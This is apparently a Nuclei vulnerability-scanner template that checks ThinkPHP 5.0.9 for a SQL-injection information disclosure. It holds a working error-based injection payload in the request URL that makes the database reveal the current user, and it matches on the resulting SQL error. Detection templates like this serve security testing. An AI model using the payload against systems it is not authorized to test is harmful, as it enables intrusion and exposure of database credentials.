id: thinkphp-509-information-disclosure

info:
  name: ThinkPHP 5.0.9 - Information Disclosure
  author: dr_set
  severity: critical
  description: ThinkPHP 5.0.9 includes verbose SQL error message that can reveal sensitive information including database credentials.
  reference:
    - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
  metadata:
    max-request: 1
  tags: thinkphp,vulhub,sqli,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SQLSTATE"
          - "XPATH syntax error"
        condition: and

      - type: status
        status:
          - 500
# digest: 4a0a00473045022100ac8bf676b3f8e69c011a71b825c6e63be90c66a97d0776b2c12b8f223e3adf06022079effece03effe38584ceea2aa694672b1b78cf8ec4c821b7841538344261be3:922c64590222798bb761d5b6d8e72950